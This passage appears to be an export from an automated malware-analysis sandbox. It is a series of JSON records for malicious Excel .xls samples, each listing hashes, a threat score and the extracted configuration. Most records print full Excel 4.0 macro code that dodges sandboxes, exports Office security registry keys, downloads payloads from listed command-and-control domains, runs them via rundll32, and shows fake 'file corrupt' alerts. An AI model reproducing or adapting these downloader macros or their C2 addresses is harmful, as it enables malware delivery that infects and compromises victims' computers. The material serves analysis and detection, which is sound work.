Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"lhBCPXnqjO\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9fc846f9605e298696dfcad85e016153c41ebe9d649e3d44f450799b2501cb5b"},"analysis":{"reported":"2020-04-09T16:18:02Z","score":10},"files":[{"filename":"9fc846f9605e298696dfcad85e016153c41ebe9d649e3d44f450799b2501cb5b","filesize":206336,"md5":"4253d96cad86d60bffd4fac2dcc74f92","sha1":"09def3626ff78854fc6ed9cd9f46621a717baf56","sha256":"9fc846f9605e298696dfcad85e016153c41ebe9d649e3d44f450799b2501cb5b","sha512":"2fd3afb055515d2382a2e3312f984c87fd0034fa1340b823b4de158fefb815a29f3227440595fa9d504b15e36fbbfaf548ca347d629ebf1bb9528d9f67c4ea86","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9fc846f9605e298696dfcad85e016153c41ebe9d649e3d44f450799b2501cb5b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"eZ1GG2RBGv\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9fe36b4014f81ec5ba0bfbfc845771b67aa3b69e1293d384e232518bf69e5ff1"},"analysis":{"reported":"2020-04-09T16:18:02Z","score":10},"files":[{"filename":"9fe36b4014f81ec5ba0bfbfc845771b67aa3b69e1293d384e232518bf69e5ff1","filesize":167936,"md5":"f0e0bec760d822b231c6ddce41b95c7e","sha1":"5da18f9c0ca782f085cc74f126642eca2692d38a","sha256":"9fe36b4014f81ec5ba0bfbfc845771b67aa3b69e1293d384e232518bf69e5ff1","sha512":"9ab993dde977c3c58ad3ac7db5fc1c31b0b8a83eac7936305eb96f65b4d9860b63351c0276fdbd73d7348cc017c7f2a95e6f94737f4ca21943c94c9354a1bd80","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9fe36b4014f81ec5ba0bfbfc845771b67aa3b69e1293d384e232518bf69e5ff1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"dHbHSVsdcZ\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"9ff4c9a5dc7801a8bc157ed63b9a099bf6b4da08e396fa725aa2aff0296d42b1"},"analysis":{"reported":"2020-04-09T16:18:02Z","score":10},"files":[{"filename":"9ff4c9a5dc7801a8bc157ed63b9a099bf6b4da08e396fa725aa2aff0296d42b1","filesize":171008,"md5":"777a35cebf82fa3346ff655f466af222","sha1":"c4baafa3e93f7608c34648201a4f961609adecd5","sha256":"9ff4c9a5dc7801a8bc157ed63b9a099bf6b4da08e396fa725aa2aff0296d42b1","sha512":"832ee64de5b9ff56b511c460525e2de09c36ac1dba75f2b443464c2b8228569159fef6807682c2bc9ae31aec1a5525bca6008be755e82a4f585c4960d4f0763d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"9ff4c9a5dc7801a8bc157ed63b9a099bf6b4da08e396fa725aa2aff0296d42b1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://ethelenecrace.xyz/fbb3"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ethelenecrace.xyz/fbb3\",\"c:\\Users\\Public\\bmjn5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bmjn5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"VOF62rBaeu\",TRUE)\nGOTO(R$1C$10)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\nFOPEN(\"c:\\users\\public\\1.reg\")\nFPOS(FOPEN(\"c:\\users\\public\\1.reg\"),215)\nFILE.DELETE(\"c:\\users\\public\\1.reg\")"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a027309a638ef3fa098b5714e70abe6db925777194a024c6d0dab5772fd1a2ed"},"analysis":{"reported":"2020-04-09T16:18:03Z","score":10},"files":[{"filename":"a027309a638ef3fa098b5714e70abe6db925777194a024c6d0dab5772fd1a2ed","filesize":185344,"md5":"871079dc726da3c75c2b1f7b3d3d04fb","sha1":"76e3cb3998cad4e8fec7324a1e3f9bb8af4668d3","sha256":"a027309a638ef3fa098b5714e70abe6db925777194a024c6d0dab5772fd1a2ed","sha512":"cd14718d7cd3d540682be30b5db148bc0d93f50596e88b610ad9c48aae78a414a2b2a4a0ec876c0e3dd4d5947eeba26aa13513449cdfbe8332f91b89c183bdec","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a027309a638ef3fa098b5714e70abe6db925777194a024c6d0dab5772fd1a2ed.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/vbdh72F"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a0586ee0ec1ff84bb5c1ac3b91f50448d05bd391aae35a863e9fc94fd43f081a"},"analysis":{"reported":"2020-04-09T16:18:03Z","score":10},"files":[{"filename":"a0586ee0ec1ff84bb5c1ac3b91f50448d05bd391aae35a863e9fc94fd43f081a","filesize":204800,"md5":"3ae2aa0c0dcc548dee1456bef353ac43","sha1":"fa3ebed6313e5ef91297f3cbc4b98ba63cdf6e64","sha256":"a0586ee0ec1ff84bb5c1ac3b91f50448d05bd391aae35a863e9fc94fd43f081a","sha512":"a3b76ed122d05bc5fcff7dd3c3532dbf3323f362c8e7a6fc022c436868e33b79eb36bb490dbe01445f1fcb14d17c69183767b36259f5d932dbadbf2dc433c2fd","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a0586ee0ec1ff84bb5c1ac3b91f50448d05bd391aae35a863e9fc94fd43f081a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,HALT())\nIF(GET.WORKSPACE(42),,HALT())\nFOPEN(\"C:\\Users\\Public\\1.vbs\",3)\nMESSAGE(TRUE,\"One moment please...\")\nIF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),EXEC(GET.NOTE(R$34C$3)),)\nIF(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2),EXEC(GET.NOTE(R$36C$3)),)\nHALT()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a06c73c546e8e95e2d1fe6e5dee6276d917431a489272de867c30ee9ac3ece0f"},"analysis":{"reported":"2020-04-09T16:18:03Z","score":10},"files":[{"filename":"a06c73c546e8e95e2d1fe6e5dee6276d917431a489272de867c30ee9ac3ece0f","filesize":185344,"md5":"f38c6f212a8fb9545f73fd5ac0a521d7","sha1":"10464d0681728ebb96af1200d1ed5b2ef6440785","sha256":"a06c73c546e8e95e2d1fe6e5dee6276d917431a489272de867c30ee9ac3ece0f","sha512":"228805484dbee518b0fcd9af6cf8fee5d876573f87b875cccf3c87fbfe89250a33f6446afe8e23d61217b7c10ec2e778ab3a049dd891ea49e5a64a0a97ce4082","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a06c73c546e8e95e2d1fe6e5dee6276d917431a489272de867c30ee9ac3ece0f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a07a1c716147139189721039c303716e4e5d1abe5ec333df47bbf807fe889c06"},"analysis":{"reported":"2020-04-09T16:18:03Z","score":10},"files":[{"filename":"a07a1c716147139189721039c303716e4e5d1abe5ec333df47bbf807fe889c06","filesize":185344,"md5":"c8ced6ad4c0737beb4adf780718be33b","sha1":"477277fe60f9863a6f115d33158470a9d9f18587","sha256":"a07a1c716147139189721039c303716e4e5d1abe5ec333df47bbf807fe889c06","sha512":"cc981eec24f3e2c3d6c3dcae17a88da304449fa29203c3c5694942f406b42bf378f666595b59a4f8729931ca42e8fb81c8d22a91020c4a07d22b014381c744d8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a07a1c716147139189721039c303716e4e5d1abe5ec333df47bbf807fe889c06.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a09f42bbae62f34c403bb0205a62f7316673a966e2963d9dd184874f481a6317"},"analysis":{"reported":"2020-04-09T16:18:03Z","score":10},"files":[{"filename":"a09f42bbae62f34c403bb0205a62f7316673a966e2963d9dd184874f481a6317","filesize":160768,"md5":"d7d4ba5a8acd9b05256fd8b10355b574","sha1":"7c3512360e0f7a62c55a040e224bb8258c423ef0","sha256":"a09f42bbae62f34c403bb0205a62f7316673a966e2963d9dd184874f481a6317","sha512":"7a0c5ead81b0ea909ab0ab236db4be735f64d481b0e72087cc38491f25fdfcf5b9f14779da84f00ff65923cbee62dd7e19bf86f6576b4974292f49797bc805aa","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a09f42bbae62f34c403bb0205a62f7316673a966e2963d9dd184874f481a6317.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"WSvyvAdEe7\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a0a5ff624157b92b8ee8d01c879f8ebda62ea4d1c1de7040715d2ba3d5511c25"},"analysis":{"reported":"2020-04-09T16:18:03Z","score":10},"files":[{"filename":"a0a5ff624157b92b8ee8d01c879f8ebda62ea4d1c1de7040715d2ba3d5511c25","filesize":209920,"md5":"ca3314fc0ababebc4cc265267d270faf","sha1":"745bb16195231aa3af8322c7bc2dc8dd945eaef0","sha256":"a0a5ff624157b92b8ee8d01c879f8ebda62ea4d1c1de7040715d2ba3d5511c25","sha512":"4481810cdb769a9cb83083fcf13c5d561b98caed0bdabe1fa5f92cc655e3aa75f0e52412787ae059bc70c751f87c150f950a38b77d499a39b784ea7c14c80ead","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a0a5ff624157b92b8ee8d01c879f8ebda62ea4d1c1de7040715d2ba3d5511c25.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"OUWw3cgaQN\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a0cc7d91e36999ae5e762d239cd6f7fcfb305e1899814b4c8293f3950d95c14e"},"analysis":{"reported":"2020-04-09T16:18:03Z","score":10},"files":[{"filename":"a0cc7d91e36999ae5e762d239cd6f7fcfb305e1899814b4c8293f3950d95c14e","filesize":170496,"md5":"2cfa6d343303bb03e1511b7e377ead87","sha1":"f40f1d3d8d7a92c4df8d486a48163445fbcc3254","sha256":"a0cc7d91e36999ae5e762d239cd6f7fcfb305e1899814b4c8293f3950d95c14e","sha512":"fd4d3003ccddc9dc98c508e51af4e5cd3c5996da4f7ae68a6cb064936f85a06fc6f4b11f5c081ad1abefc9e29aaacf086c192a66c46bc0360dd298ff184ae935","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a0cc7d91e36999ae5e762d239cd6f7fcfb305e1899814b4c8293f3950d95c14e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"iPLtBDLoXP\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a0ceb8b202c046c9241f45a36d57af6cea78c4b49e747884b0753546e49b6ce0"},"analysis":{"reported":"2020-04-09T16:18:03Z","score":10},"files":[{"filename":"a0ceb8b202c046c9241f45a36d57af6cea78c4b49e747884b0753546e49b6ce0","filesize":209408,"md5":"fa985e0177cb27104d60ce9649bbadfa","sha1":"5de9dfb9b72536245f640b9e6f52d165b93d408e","sha256":"a0ceb8b202c046c9241f45a36d57af6cea78c4b49e747884b0753546e49b6ce0","sha512":"2295f20f6d835b497d46a0b4348ae9fb27e524581630a7902f0a62cd3d385b2f85d498663a084cde31a87c44858ca8accd9f18303cd00d15e3681fbb4c374876","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a0ceb8b202c046c9241f45a36d57af6cea78c4b49e747884b0753546e49b6ce0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://paxtontranter.xyz/rv24t2"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://paxtontranter.xyz/rv24t2\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"V2yJNw1jet\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a0f919de5653f3b8856f970461303e9076a593a24fbe791e1b10e3b5fe4e099f"},"analysis":{"reported":"2020-04-09T16:18:03Z","score":10},"files":[{"filename":"a0f919de5653f3b8856f970461303e9076a593a24fbe791e1b10e3b5fe4e099f","filesize":209408,"md5":"4e63f05f6531852ac4d6f4754c1bc0fb","sha1":"828f5544fc5befceee4fcdcab2590b4b83172fa5","sha256":"a0f919de5653f3b8856f970461303e9076a593a24fbe791e1b10e3b5fe4e099f","sha512":"1bbc4fbbf6bf4d7c4852758d275daa7fe3ed32a9ebc73ebb0fdd40d55463c25b9c675b2dd34ba84ee5a88bc1359dfc4e2085146726d2549c6d230f004bb3e9bd","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a0f919de5653f3b8856f970461303e9076a593a24fbe791e1b10e3b5fe4e099f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://paxtontranter.xyz/rv24t2"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://paxtontranter.xyz/rv24t2\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"bJwdnjHeBN\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a11661c05ecdcc962fb6f5c50c9959fa7c8a67f5bcdff420fda4eb2d31db8743"},"analysis":{"reported":"2020-04-09T16:18:03Z","score":10},"files":[{"filename":"a11661c05ecdcc962fb6f5c50c9959fa7c8a67f5bcdff420fda4eb2d31db8743","filesize":146944,"md5":"dea00fe0b85fa9cb9b1ac8ce40f88b72","sha1":"956ad6ae5785b60ff1ad9c1a5c3b6157bdfcced9","sha256":"a11661c05ecdcc962fb6f5c50c9959fa7c8a67f5bcdff420fda4eb2d31db8743","sha512":"4978c949ff14b63312594609a82b1ad820c1ecf9d12c4206463f2a24d4fd839f13ef1099bdf302e3a8d036c6c61619ced91236a752455286f72407bcec7120d7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a11661c05ecdcc962fb6f5c50c9959fa7c8a67f5bcdff420fda4eb2d31db8743.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/ckjbvkf732"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"VirbuRjJme\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a15671e6de3fbb13cc68acc2f0c99523bb79fad7e824645bd15f2dd6806c7be5"},"analysis":{"reported":"2020-04-09T16:18:03Z","score":10},"files":[{"filename":"a15671e6de3fbb13cc68acc2f0c99523bb79fad7e824645bd15f2dd6806c7be5","filesize":167936,"md5":"2f6e9f2927a0f973e1056234da3d50e9","sha1":"179d69019772b967d1574acd0dc6601db04434ee","sha256":"a15671e6de3fbb13cc68acc2f0c99523bb79fad7e824645bd15f2dd6806c7be5","sha512":"95b2c057e41b2516846c82e8c6ecb5509b192419c26dbe616ea069bfc3651cd150d18a8139a53cc99b436ac4fbd5afe1571bc0b439c1dc54eb35a86993647ba1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a15671e6de3fbb13cc68acc2f0c99523bb79fad7e824645bd15f2dd6806c7be5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"fYVM3TxfKm\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"a1695cc34b862ce77887410e69a77048c06b850abe93d25dea945f9c81f88789"},"analysis":{"reported":"2020-04-09T16:18:03Z","score":10},"files":[{"filename":"a1695cc34b862ce77887410e69a77048c06b850abe93d25dea945f9c81f88789","filesize":132608,"md5":"f35a3bd8cd470486348ce4b2ec555c9f","sha1":"37ebbdd92a721dce3ce8dbaf511278e8ee827bf7","sha256":"a1695cc34b862ce77887410e69a77048c06b850abe93d25dea945f9c81f88789","sha512":"7f6802e9306d9dd04c260afb86a51f5a8ebea319105d18399c192b26e1d8c97760a711f241d0abb9775ac02acc0f808ff7e3eec6b042fbf55b07feb9cd2b45de","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"a1695cc34b862ce77887410e69a77048c06b850abe93d25dea945f9c81f88789.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rosannahtacey.xyz/vg43"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), 